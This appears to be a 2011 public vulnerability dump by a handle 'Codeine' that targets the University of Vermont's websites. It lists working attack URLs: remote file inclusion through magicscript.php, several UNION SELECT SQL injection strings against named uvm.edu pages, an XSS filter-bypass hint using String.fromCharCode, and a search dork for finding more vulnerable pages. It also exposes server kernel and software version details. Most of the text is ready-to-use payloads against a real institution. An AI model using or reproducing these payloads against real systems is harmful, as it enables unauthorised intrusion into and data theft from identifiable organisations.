############################################################################################## | Title : University Of Vermont Multiple Vulnerabilities(uvm.edu) | Author : Codeine | Email : f3codeine[at]yahoo[dot]com | Tiwtter: codeinesec | Date : 08/10/2011 | Cat : PHP[RFI,SQLI,XSS] | URL : http://uvm.edu/ ############################################################################################## Uname: Linux tarantula.uvm.edu 2.6.23.17-3.uvm #1 SMP Tue Dec 15 12:08:51 EST 2009i686 Software: Apache/2.2.3 (Red Hat). PHP/5.3.3 ############################################################################################## The University Of Vermont suffers from multiple web application vulnerabilities such as Remote File Inclusion, Sql Injection, Cross Site Scripting(XSS). ############################################################################################## [*]Remote File Inclusion- magicscript.php?Page=Calendar&intro=http://google.com/ This script shows up in almost every directory of every subdomain of uvm.edu. http://vermontdesigninstitute.org/extension/magicscript.php?Page=Calendar&intro=http://google.com/ http://www.uvm.edu/magicscript.php?Page=Calendar&intro=http://google.com/ Dork: site:uvm.edu inurl:magicscript _________________________________________________________________________________________________ [*]SqlInjection- http://vmc.snr.uvm.edu/vmc/research/metadata.php?id=-25%20union%20select%20@@version,2,3-- [*]Xss- http://vmc.snr.uvm.edu/vmc/research/searchresults.php (Post) Magic quoates are active, but easily bypassable with "String.fromCharCode" The above is what I sent to post, which contains "CodeineXss" _________________________________________________________________________________________________ [*]SqlInjection- http://www.uvm.edu/rsenr/nsrc/projectpages/project.php?id=-69%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89-- _________________________________________________________________________________________________ [*]SqlInjection- http://bol.uvm.edu/tool_feature.php?id=-1%20UNION%20SELECT%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- _________________________________________________________________________________________________ Greetz Hidden Ninja